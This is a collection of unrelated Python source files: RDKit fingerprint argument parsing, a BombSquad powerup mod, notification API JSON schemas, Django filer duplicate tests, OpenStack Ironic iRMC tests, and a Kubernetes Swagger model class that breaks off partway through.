elif arg == '-t':
details.tableName = val
elif arg == '-o':
details.outFileName = val
elif arg == '--minSize':
details.minSize = int(val)
elif arg == '--maxSize':
details.fpSize = int(val)
elif arg == '--density':
details.tgtDensity = float(val)
elif arg == '--outTable':
details.outTableName = val
elif arg == '--outDbName':
details.outDbName = val
elif arg == '--fpColName':
details.fpColName = val
elif arg == '--minPath':
details.minPath = int(val)
elif arg == '--maxPath':
details.maxPath = int(val)
elif arg == '--nBitsPerHash':
details.bitsPerHash = int(val)
elif arg == '--discrim':
details.discrimHash = 1
elif arg == '--smilesName':
details.smilesName = val
elif arg == '--molPkl':
details.molPklName = val
elif arg == '--useSD':
details.useSmiles = False
details.useSD = True
elif arg == '--idName':
details.idName = val
elif arg == '--maxMols':
details.maxMols = int(val)
elif arg == '--useMACCS':
details.fingerprinter = MACCSkeys.GenMACCSKeys
elif arg == '--keepTable':
details.replaceTable = False
# SCREENER:
elif arg == '--smilesTable':
details.smilesTableName = val
elif arg == '--topN':
details.doThreshold = 0
details.topN = int(val)
elif arg == '--thresh':
details.doThreshold = 1
details.screenThresh = float(val)
elif arg == '--smiles':
details.probeSmiles = val
elif arg == '--dice':
details.metric = DataStructs.DiceSimilarity
elif arg == '--cosine':
details.metric = DataStructs.CosineSimilarity
# CLUSTERS:
elif arg == '--SLINK':
details.clusterAlgo = Murtagh.SLINK
elif arg == '--CLINK':
details.clusterAlgo = Murtagh.CLINK
elif arg == '--UPGMA':
details.clusterAlgo = Murtagh.UPGMA
elif arg == '--actTable':
details.actTableName = val
elif arg == '--actName':
details.actName = val
elif arg == '-h':
Usage()
return details
if __name__ == '__main__':
message("This is FingerprintMols\n\n")
details = ParseArgs()
FingerprintsFromDetails(details)
|
|
import bs
import random
#add for bunny buddy:
import BuddyBunny
import SnoBallz
import bsPowerup
import bsSpaz
import Portal
from bsPowerup import PowerupMessage, PowerupAcceptMessage, _TouchedMessage, PowerupFactory, Powerup
defaultPowerupInterval = 8000
class NewPowerupFactory(PowerupFactory):
def __init__(self):
self._lastPowerupType = None
self.model = bs.getModel("powerup")
self.modelSimple = bs.getModel("powerupSimple")
self.texBomb = bs.getTexture("powerupBomb")
self.texPunch = bs.getTexture("powerupPunch")
self.texIceBombs = bs.getTexture("powerupIceBombs")
self.texStickyBombs = bs.getTexture("powerupStickyBombs")
self.texShield = bs.getTexture("powerupShield")
self.texImpactBombs = bs.getTexture("powerupImpactBombs")
self.texHealth = bs.getTexture("powerupHealth")
self.texLandMines = bs.getTexture("powerupLandMines")
self.texCurse = bs.getTexture("powerupCurse")
#Add for Bunnybot:
self.eggModel = bs.getModel('egg')
self.texEgg = bs.getTexture('eggTex1')
#Add for snoBalls:
self.texSno = bs.getTexture("bunnyColor") #Bunny is most uniform plain white color.
self.snoModel = bs.getModel("frostyPelvis") #Frosty pelvis is very nice and round...
self.healthPowerupSound = bs.getSound("healthPowerup")
self.powerupSound = bs.getSound("powerup01")
self.powerdownSound = bs.getSound("powerdown01")
self.dropSound = bs.getSound("boxDrop")
self.texPort = bs.getTexture("ouyaOButton")
# material for powerups
self.powerupMaterial = bs.Material()
# material for anyone wanting to accept powerups
self.powerupAcceptMaterial = bs.Material()
# pass a powerup-touched message to applicable stuff
self.powerupMaterial.addActions(
conditions=(("theyHaveMaterial",self.powerupAcceptMaterial)),
actions=(("modifyPartCollision","collide",True),
("modifyPartCollision","physical",False),
("message","ourNode","atConnect",_TouchedMessage())))
# we dont wanna be picked up
self.powerupMaterial.addActions(
conditions=("theyHaveMaterial",bs.getSharedObject('pickupMaterial')),
actions=( ("modifyPartCollision","collide",False)))
self.powerupMaterial.addActions(
conditions=("theyHaveMaterial",bs.getSharedObject('footingMaterial')),
actions=(("impactSound",self.dropSound,0.5,0.1)))
self._powerupDist = []
for p,freq in getDefaultPowerupDistribution():
for i in range(int(freq)):
self._powerupDist.append(p)
def getRandomPowerupType(self, forceType=None, excludeTypes=None):
if excludeTypes:
# exclude custom powerups if there is some custom powerup logic
# example: bsFootball.py:456
excludeTypes.append('snoball')
excludeTypes.append('bunny')
else:
excludeTypes = []
return PowerupFactory.getRandomPowerupType(self, forceType, excludeTypes)
def getDefaultPowerupDistribution():
return (('tripleBombs',3),
('iceBombs',3),
('punch',3),
('impactBombs',3),
('landMines',2),
('stickyBombs',3),
('shield',2),
('health',1),
('bunny',2),
('portal',2),
('curse',1),
('snoball',3))
class NewPowerup(Powerup):
def __init__(self,position=(0,1,0),powerupType='tripleBombs',expire=True):
"""
Create a powerup-box of the requested type at the requested position.
see bs.Powerup.powerupType for valid type strings.
"""
bs.Actor.__init__(self)
factory = self.getFactory()
self.powerupType = powerupType;
self._powersGiven = False
mod = factory.model
mScl = 1
if powerupType == 'tripleBombs': tex = factory.texBomb
elif powerupType == 'punch': tex = factory.texPunch
elif powerupType == 'iceBombs': tex = factory.texIceBombs
elif powerupType == 'impactBombs': tex = factory.texImpactBombs
elif powerupType == 'landMines': tex = factory.texLandMines
elif powerupType == 'stickyBombs': tex = factory.texStickyBombs
elif powerupType == 'shield': tex = factory.texShield
elif powerupType == 'health': tex = factory.texHealth
elif powerupType == 'curse': tex = factory.texCurse
elif powerupType == 'portal': tex = factory.texPort
elif powerupType == 'bunny':
tex = factory.texEgg
mod = factory.eggModel
mScl = 0.7
elif powerupType == 'snoball':
tex = factory.texSno
mod = factory.snoModel
else: raise Exception("invalid powerupType: "+str(powerupType))
if len(position) != 3: raise Exception("expected 3 floats for position")
self.node = bs.newNode('prop',
delegate=self,
attrs={'body':'box',
'position':position,
'model':mod,
'lightModel':factory.modelSimple,
'shadowSize':0.5,
'colorTexture':tex,
'reflection':'powerup',
'reflectionScale':[1.0],
'materials':(factory.powerupMaterial,bs.getSharedObject('objectMaterial'))})
# animate in..
curve = bs.animate(self.node,"modelScale",{0:0,140:1.6,200:mScl})
bs.gameTimer(200,curve.delete)
if expire:
bs.gameTimer(defaultPowerupInterval-2500,bs.WeakCall(self._startFlashing))
bs.gameTimer(defaultPowerupInterval-1000,bs.WeakCall(self.handleMessage,bs.DieMessage()))
def delpor(self):
Portal.currentnum -= 1
self.port.delete()
def handleMessage(self,m):
self._handleMessageSanityCheck()
if isinstance(m,PowerupAcceptMessage):
factory = self.getFactory()
if self.powerupType == 'health':
bs.playSound(factory.healthPowerupSound,3,position=self.node.position)
bs.playSound(factory.powerupSound,3,position=self.node.position)
self._powersGiven = True
self.handleMessage(bs.DieMessage())
elif isinstance(m,_TouchedMessage):
if not self._powersGiven:
node = bs.getCollisionInfo("opposingNode")
if node is not None and node.exists():
#We won't tell the spaz about the bunny. It'll just happen.
if self.powerupType == 'bunny':
p=node.getDelegate().getPlayer()
if 'bunnies' not in p.gameData:
p.gameData['bunnies'] = BuddyBunny.BunnyBotSet(p)
p.gameData['bunnies'].doBunny()
self._powersGiven = True
self.handleMessage(bs.DieMessage())
#a Spaz doesn't know what to do with a snoball powerup. All the snowball functionality
#is handled through SnoBallz.py to minimize modifications to the original game files
elif self.powerupType == 'snoball':
spaz=node.getDelegate()
SnoBallz.snoBall().getFactory().giveBallz(spaz)
self._powersGiven = True
self.handleMessage(bs.DieMessage())
elif self.powerupType == 'portal':
t = bsSpaz.gPowerupWearOffTime
if Portal.currentnum < Portal.maxportals :
Portal.currentnum += 1
if self.node.position in Portal.lastpos :
self.port = Portal.Portal(position1 = None,r = 0.9,color = (random.random(),random.random(),random.random()),activity = bs.getActivity())
bs.gameTimer(t,bs.Call(self.delpor))
else :
m = self.node.position
Portal.lastpos.append(m)
self.port = Portal.Portal(position1 = self.node.position,r = 0.9,color = (random.random(),random.random(),random.random()),activity = bs.getActivity())
bs.gameTimer(t,bs.Call(self.delpor))
self._powersGiven = True
self.handleMessage(bs.DieMessage())
else:
node.handleMessage(PowerupMessage(self.powerupType,sourceNode=self.node))
elif isinstance(m,bs.DieMessage):
if self.node.exists():
if (m.immediate):
self.node.delete()
else:
curve = bs.animate(self.node,"modelScale",{0:1,100:0})
bs.gameTimer(100,self.node.delete)
elif isinstance(m,bs.OutOfBoundsMessage):
self.handleMessage(bs.DieMessage())
elif isinstance(m,bs.HitMessage):
# dont die on punches (thats annoying)
if m.hitType != 'punch':
self.handleMessage(bs.DieMessage())
else:
bs.Actor.handleMessage(self,m)
bsPowerup.PowerupFactory = NewPowerupFactory
bsPowerup.Powerup = NewPowerup
|
|
from integration_test.schemas.v2.definitions import personalisation, uuid
template = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "template schema",
"type": "object",
"title": "notification content",
"properties": {
"id": uuid,
"version": {"type": "integer"},
"uri": {"type": "string"}
},
"required": ["id", "version", "uri"]
}
get_notification_response = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "GET notification response schema",
"type": "object",
"title": "response v2/notification",
"properties": {
"id": uuid,
"reference": {"type": ["string", "null"]},
"email_address": {"type": ["string", "null"]},
"phone_number": {"type": ["string", "null"]},
"line_1": {"type": ["string", "null"]},
"line_2": {"type": ["string", "null"]},
"line_3": {"type": ["string", "null"]},
"line_4": {"type": ["string", "null"]},
"line_5": {"type": ["string", "null"]},
"line_6": {"type": ["string", "null"]},
"postcode": {"type": ["string", "null"]},
"postage": {"enum": ["first", "second", None]},
"type": {"enum": ["sms", "letter", "email"]},
"status": {"type": "string"},
"template": template,
"body": {"type": "string"},
"subject": {"type": ["string", "null"]},
"created_at": {"type": "string"},
"sent_at": {"type": ["string", "null"]},
"completed_at": {"type": ["string", "null"]},
"created_by_name": {"type": ["string", "null"]}
},
"required": [
# technically, all keys are required since we always have all of them
"id", "reference", "email_address", "phone_number",
"line_1", "line_2", "line_3", "line_4", "line_5", "line_6", "postcode",
"type", "status", "template", "body", "created_at", "sent_at", "completed_at"
]
}
get_notifications_response = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "GET list of notifications response schema",
"type": "object",
"properties": {
"notifications": {
"type": "array",
"items": {
"type": "object",
"ref": get_notification_response
}
},
"links": {
"type": "object",
"properties": {
"current": {
"type": "string"
},
"next": {
"type": "string"
}
},
"additionalProperties": False,
"required": ["current"]
}
},
"additionalProperties": False,
"required": ["notifications", "links"]
}
post_sms_request = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "POST sms notification schema",
"type": "object",
"title": "POST v2/notifications/sms",
"properties": {
"reference": {"type": "string"},
"phone_number": {"type": "string", "format": "phone_number"},
"template_id": uuid,
"sms_sender_id": uuid,
"personalisation": personalisation
},
"required": ["phone_number", "template_id"]
}
sms_content = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "content schema for SMS notification response schema",
"type": "object",
"title": "notification content",
"properties": {
"body": {"type": "string"},
"from_number": {"type": ["string", "null"]}
},
"required": ["body"]
}
post_sms_response = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "POST sms notification response schema",
"type": "object",
"title": "response v2/notifications/sms",
"properties": {
"id": uuid,
"reference": {"type": ["string", "null"]},
"content": sms_content,
"uri": {"type": "string"},
"template": template
},
"required": ["id", "content", "uri", "template"]
}
post_email_request = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "POST email notification schema",
"type": "object",
"title": "POST v2/notifications/email",
"properties": {
"reference": {"type": "string"},
"email_address": {"type": "string", "format": "email_address"},
"template_id": uuid,
"email_reply_to_id": uuid,
"personalisation": personalisation
},
"required": ["email_address", "template_id"]
}
email_content = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Email content for POST email notification",
"type": "object",
"title": "notification email content",
"properties": {
"from_email": {"type": "string", "format": "email_address"},
"body": {"type": "string"},
"subject": {"type": "string"}
},
"required": ["body", "from_email", "subject"]
}
post_email_response = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "POST email notification response schema",
"type": "object",
"title": "response v2/notifications/email",
"properties": {
"id": uuid,
"reference": {"type": ["string", "null"]},
"content": email_content,
"uri": {"type": "string"},
"template": template
},
"required": ["id", "content", "uri", "template"]
}
post_letter_request = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "POST letter notification schema",
"type": "object",
"title": "POST v2/notifications/letter",
"properties": {
"reference": {"type": "string"},
"template_id": uuid,
"personalisation": personalisation
},
"required": ["letter_address", "template_id"]
}
letter_content = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Letter content for POST letter notification",
"type": "object",
"title": "notification letter content",
"properties": {
"body": {"type": ["string", "null"]},
"subject": {"type": "string"}
},
"required": ["body", "subject"]
}
post_letter_response = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "POST letter notification response schema",
"type": "object",
"title": "response v2/notifications/letter",
"properties": {
"id": uuid,
"reference": {"type": ["string", "null"]},
"content": letter_content,
"uri": {"type": "string"},
"template": template
},
"required": ["id", "content", "uri", "template"]
}
post_precompiled_letter_response = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "POST letter notification response schema",
"type": "object",
"title": "response v2/notifications/letter",
"properties": {
"id": uuid,
"reference": {"type": ["string", "null"]},
"postage": {"enum": ["first", "second", None]}
},
"required": ["id", "reference"]
}
def create_post_sms_response_from_notification(notification, body, from_number, url_root):
return {"id": notification.id,
"reference": notification.client_reference,
"content": {'body': body,
'from_number': from_number},
"uri": "{}/v2/notifications/{}".format(url_root, str(notification.id)),
"template": __create_template_from_notification(notification=notification, url_root=url_root)
}
def create_post_email_response_from_notification(notification, content, subject, email_from, url_root):
return {
"id": notification.id,
"reference": notification.client_reference,
"content": {
"from_email": email_from,
"body": content,
"subject": subject
},
"uri": "{}/v2/notifications/{}".format(url_root, str(notification.id)),
"template": __create_template_from_notification(notification=notification, url_root=url_root)
}
def __create_template_from_notification(notification, url_root):
return {
"id": notification.template_id,
"version": notification.template_version,
"uri": "{}/v2/templates/{}".format(url_root, str(notification.template_id))
}
|
|
# -*- coding: utf-8 -*-
from django.test import TestCase, override_settings, modify_settings
from filer.tests import create_superuser
from filer.models import File, Folder
from filer_addons.tests.utils import create_django_file
from filer_addons.filer_signals import conf as signals_conf
try:
reload
except NameError:
from importlib import reload
DUPLICATE_HANDLING_DISABLED = {
'prevent': False,
}
DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES = {
'prevent': True,
'created_only': True,
'same_folder_required': False,
'same_filename_required': False,
}
DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES_WITH_EXISTING = {
'prevent': True,
'created_only': False,
'same_folder_required': False,
'same_filename_required': False,
}
@modify_settings(INSTALLED_APPS={
'append': 'filer_addons.filer_signals',
})
class DuplicatesTests(TestCase):
def setUp(self):
reload(signals_conf)
self.superuser = create_superuser()
self.client.login(username='admin', password='secret')
self.folder = Folder.objects.create(name='test')
self.another_folder = Folder.objects.create(name='test')
def tearDown(self):
self.delete_files()
for folder in Folder.objects.all():
folder.delete()
def delete_files(self):
for f in File.objects.all():
f.delete()
def create_two_files(self, duplicates=True, **kwargs):
"""
two files
without args: duplicates, in "unfiled files"
kwargs different_folder: second file in self.another_folder
kwargs different_name: second file filename = file2.jpg
:param duplicates:
:param kwargs:
:return:
"""
size = (50, 50, )
size2 = (20, 20, )
if duplicates:
size2 = size
folder = kwargs.get('folder', None)
if kwargs.get('different_folder', None):
folder2 = self.another_folder
else:
folder2 = folder
filename = 'file1.jpg'
if kwargs.get('different_name', None):
filename2 = 'file2.jpg'
else:
filename2 = filename
django_file1 = create_django_file(filename=filename, size=size)
django_file2 = create_django_file(filename=filename2, size=size2)
file_obj = File.objects.create(
owner=self.superuser,
original_filename=filename,
file=django_file1,
folder=folder,
)
file_obj.save()
file_obj2 = File.objects.create(
owner=self.superuser,
original_filename=filename2,
file=django_file2,
folder=folder2,
)
file_obj2.save()
def test_no_duplicates(self):
# first, no duplicates
self.create_two_files(duplicates=False)
self.assertEquals(File.objects.all().count(), 2)
# now, there are duplicates!
self.create_two_files(duplicates=False)
self.assertEquals(File.objects.all().count(), 2)
def test_has_duplicate_no_folder(self):
"""
same filename, same (none) folder
:return:
"""
self.create_two_files(duplicates=True)
self.assertEquals(File.objects.all().count(), 1)
# same again, dups!
self.create_two_files(duplicates=True)
self.assertEquals(File.objects.all().count(), 1)
def test_no_duplicate_different_folder(self):
"""
same filename, different folder => no duplicate with default settings!
:return:
"""
self.create_two_files(duplicates=True, different_folder=True)
self.assertEquals(File.objects.all().count(), 2)
# same again, dups!
self.create_two_files(duplicates=True, different_folder=True)
self.assertEquals(File.objects.all().count(), 2)
def test_duplicate_different_filename(self):
"""
same filename, same folder => duplicate with default settings!
:return:
"""
self.create_two_files(duplicates=True, different_name=True)
self.assertEquals(File.objects.all().count(), 1)
# same again, dups!
self.create_two_files(duplicates=True, different_name=True)
self.assertEquals(File.objects.all().count(), 1)
@override_settings(
FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_DISABLED
)
def test_duplicate_detection_disabled(self):
reload(signals_conf)
self.create_two_files(duplicates=True, )
self.assertEquals(File.objects.all().count(), 2)
# same again, dups!
self.create_two_files(duplicates=True, )
self.assertEquals(File.objects.all().count(), 4)
@override_settings(
FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES
)
def test_duplicates_anywhere(self):
reload(signals_conf)
self.create_two_files(
duplicates=True,
different_name=True,
different_folder=True,
)
self.assertEquals(File.objects.all().count(), 1)
# same again, still dups!
self.create_two_files(
duplicates=True,
folder=self.folder,
different_name=True,
different_folder=True,
)
self.assertEquals(File.objects.all().count(), 1)
@override_settings(
FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_DISABLED
)
def test_duplicates_greedy(self):
"""
test greedy mode: already existing duplicates will also be merged
:return:
"""
reload(signals_conf)
self.create_two_files(duplicates=True, different_name=True)
self.assertEquals(File.objects.all().count(), 2)
with self.settings(
FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES_WITH_EXISTING # noqa
):
reload(signals_conf)
self.create_two_files(duplicates=True, different_name=True)
self.assertEquals(File.objects.all().count(), 1)
@override_settings(
FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_DISABLED
)
def test_duplicates_is_not_greedy(self):
"""
test that normal mode is not greedy
already existing duplicates will not be merged
:return:
"""
reload(signals_conf)
self.create_two_files(duplicates=True, different_name=True)
self.assertEquals(File.objects.all().count(), 2)
with self.settings(
FILER_ADDONS_DUPLICATE_HANDLING=DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES # noqa
):
reload(signals_conf)
self.create_two_files(duplicates=True, different_name=True)
self.assertEquals(File.objects.all().count(), 2)
|
|
# Copyright 2015 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test class for common methods used by iRMC modules.
"""
import mock
from oslo_config import cfg
from ironic.common import exception
from ironic.conductor import task_manager
from ironic.drivers.modules.irmc import common as irmc_common
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.drivers import third_party_driver_mock_specs \
as mock_specs
from ironic.tests.unit.objects import utils as obj_utils
class IRMCValidateParametersTestCase(db_base.DbTestCase):
def setUp(self):
super(IRMCValidateParametersTestCase, self).setUp()
self.node = obj_utils.create_test_node(
self.context,
driver='fake_irmc',
driver_info=db_utils.get_test_irmc_info())
def test_parse_driver_info(self):
info = irmc_common.parse_driver_info(self.node)
self.assertEqual('1.2.3.4', info['irmc_address'])
self.assertEqual('admin0', info['irmc_username'])
self.assertEqual('fake0', info['irmc_password'])
self.assertEqual(60, info['irmc_client_timeout'])
self.assertEqual(80, info['irmc_port'])
self.assertEqual('digest', info['irmc_auth_method'])
self.assertEqual('ipmitool', info['irmc_sensor_method'])
self.assertEqual('v2c', info['irmc_snmp_version'])
self.assertEqual(161, info['irmc_snmp_port'])
self.assertEqual('public', info['irmc_snmp_community'])
self.assertFalse(info['irmc_snmp_security'])
def test_parse_driver_option_default(self):
self.node.driver_info = {
"irmc_address": "1.2.3.4",
"irmc_username": "admin0",
"irmc_password": "fake0",
}
info = irmc_common.parse_driver_info(self.node)
self.assertEqual('basic', info['irmc_auth_method'])
self.assertEqual(443, info['irmc_port'])
self.assertEqual(60, info['irmc_client_timeout'])
self.assertEqual('ipmitool', info['irmc_sensor_method'])
def test_parse_driver_info_missing_address(self):
del self.node.driver_info['irmc_address']
self.assertRaises(exception.MissingParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_missing_username(self):
del self.node.driver_info['irmc_username']
self.assertRaises(exception.MissingParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_missing_password(self):
del self.node.driver_info['irmc_password']
self.assertRaises(exception.MissingParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_invalid_timeout(self):
self.node.driver_info['irmc_client_timeout'] = 'qwe'
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_invalid_port(self):
self.node.driver_info['irmc_port'] = 'qwe'
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_invalid_auth_method(self):
self.node.driver_info['irmc_auth_method'] = 'qwe'
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_invalid_sensor_method(self):
self.node.driver_info['irmc_sensor_method'] = 'qwe'
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_missing_multiple_params(self):
del self.node.driver_info['irmc_password']
del self.node.driver_info['irmc_address']
e = self.assertRaises(exception.MissingParameterValue,
irmc_common.parse_driver_info, self.node)
self.assertIn('irmc_password', str(e))
self.assertIn('irmc_address', str(e))
def test_parse_driver_info_invalid_snmp_version(self):
self.node.driver_info['irmc_snmp_version'] = 'v3x'
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_invalid_snmp_port(self):
self.node.driver_info['irmc_snmp_port'] = '161'
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_invalid_snmp_community(self):
self.node.driver_info['irmc_snmp_version'] = 'v2c'
self.node.driver_info['irmc_snmp_community'] = 100
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_invalid_snmp_security(self):
self.node.driver_info['irmc_snmp_version'] = 'v3'
self.node.driver_info['irmc_snmp_security'] = 100
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
def test_parse_driver_info_empty_snmp_security(self):
self.node.driver_info['irmc_snmp_version'] = 'v3'
self.node.driver_info['irmc_snmp_security'] = ''
self.assertRaises(exception.InvalidParameterValue,
irmc_common.parse_driver_info, self.node)
class IRMCCommonMethodsTestCase(db_base.DbTestCase):
def setUp(self):
super(IRMCCommonMethodsTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_irmc")
self.info = db_utils.get_test_irmc_info()
self.node = obj_utils.create_test_node(
self.context,
driver='fake_irmc',
driver_info=self.info)
@mock.patch.object(irmc_common, 'scci',
spec_set=mock_specs.SCCICLIENT_IRMC_SCCI_SPEC)
def test_get_irmc_client(self, mock_scci):
self.info['irmc_port'] = 80
self.info['irmc_auth_method'] = 'digest'
self.info['irmc_client_timeout'] = 60
mock_scci.get_client.return_value = 'get_client'
returned_mock_scci_get_client = irmc_common.get_irmc_client(self.node)
mock_scci.get_client.assert_called_with(
self.info['irmc_address'],
self.info['irmc_username'],
self.info['irmc_password'],
port=self.info['irmc_port'],
auth_method=self.info['irmc_auth_method'],
client_timeout=self.info['irmc_client_timeout'])
self.assertEqual('get_client', returned_mock_scci_get_client)
def test_update_ipmi_properties(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
ipmi_info = {
"ipmi_address": "1.2.3.4",
"ipmi_username": "admin0",
"ipmi_password": "fake0",
}
task.node.driver_info = self.info
irmc_common.update_ipmi_properties(task)
actual_info = task.node.driver_info
expected_info = dict(self.info, **ipmi_info)
self.assertEqual(expected_info, actual_info)
@mock.patch.object(irmc_common, 'scci',
spec_set=mock_specs.SCCICLIENT_IRMC_SCCI_SPEC)
def test_get_irmc_report(self, mock_scci):
self.info['irmc_port'] = 80
self.info['irmc_auth_method'] = 'digest'
self.info['irmc_client_timeout'] = 60
mock_scci.get_report.return_value = 'get_report'
returned_mock_scci_get_report = irmc_common.get_irmc_report(self.node)
mock_scci.get_report.assert_called_with(
self.info['irmc_address'],
self.info['irmc_username'],
self.info['irmc_password'],
port=self.info['irmc_port'],
auth_method=self.info['irmc_auth_method'],
client_timeout=self.info['irmc_client_timeout'])
self.assertEqual('get_report', returned_mock_scci_get_report)
def test_out_range_port(self):
self.assertRaises(ValueError, cfg.CONF.set_override,
'port', 60, 'irmc', enforce_type=True)
def test_out_range_auth_method(self):
self.assertRaises(ValueError, cfg.CONF.set_override,
'auth_method', 'fake', 'irmc', enforce_type=True)
def test_out_range_sensor_method(self):
self.assertRaises(ValueError, cfg.CONF.set_override,
'sensor_method', 'fake', 'irmc', enforce_type=True)
|
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class AppsV1beta1DeploymentRollback(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'kind': 'str',
'name': 'str',
'rollback_to': 'AppsV1beta1RollbackConfig',
'updated_annotations': 'dict(str, str)'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'name': 'name',
'rollback_to': 'rollbackTo',
'updated_annotations': 'updatedAnnotations'
}
def __init__(self, api_version=None, kind=None, name=None, rollback_to=None, updated_annotations=None):
"""
AppsV1beta1DeploymentRollback - a model defined in Swagger
"""
self._api_version = None
self._kind = None
self._name = None
self._rollback_to = None
self._updated_annotations = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
self.name = name
self.rollback_to = rollback_to
if updated_annotations is not None:
self.updated_annotations = updated_annotations
@property
def api_version(self):
"""
Gets the api_version of this AppsV1beta1DeploymentRollback.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this AppsV1beta1DeploymentRollback.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this AppsV1beta1DeploymentRollback.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this AppsV1beta1DeploymentRollback.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this AppsV1beta1DeploymentRollback.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this AppsV1beta1DeploymentRollback.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this AppsV1beta1DeploymentRollback.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this AppsV1beta1DeploymentRollback.
:type: str
"""
self._kind = kind
@property
def name(self):
"""
Gets the name of this AppsV1beta1DeploymentRollback.
Required: This must match the Name of a deployment.
:return: The name of this AppsV1beta1DeploymentRollback.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this AppsV1beta1DeploymentRollback.
Required: This must match the Name of a deployment.
:param name: The name of this AppsV1beta1DeploymentRollback.
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`")
self._name = name
@property
def rollback_to(self):
"""
Gets the rollback_to of this AppsV1beta1DeploymentRollback.
The config of this deployment rollback.
:return: The rollback_to of this AppsV1beta1DeploymentRollback.
:rtype: AppsV1beta1RollbackConfig
"""
return self._rollback_to
@rollback_to.setter
def rollback_to(self, rollback_to):
"""
Sets the rollback_to of this AppsV1beta1DeploymentRollback.
The config of this deployment rollback.
:param rollback_to: The rollback_to of this AppsV1beta1DeploymentRollback.
:type: AppsV1beta1RollbackConfig
"""
if rollback_to is None:
raise ValueError("Invalid value for `rollback_to`, must not be `None`")
self._rollback_to = rollback_to
@property
def updated_annotations(self):
"""
Gets the updated_annotations of this AppsV1beta1DeploymentRollback.
The annotations to be updated to a deployment
:return: The updated_annotations of this AppsV1beta1DeploymentRollback.
:rtype: dict(str, str)
"""
return self._updated_annotations
@updated_annotations.setter
def updated_annotations(self, updated_annotations):
"""
Sets the updated_annotations of this AppsV1beta1DeploymentRollback.
The annotations to be updated to a deployment
:param updated_annotations: The updated_annotations of this AppsV1beta1DeploymentRollback.
:type: dict(str, str)
"""
self._updated_annotations = updated_annotations
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
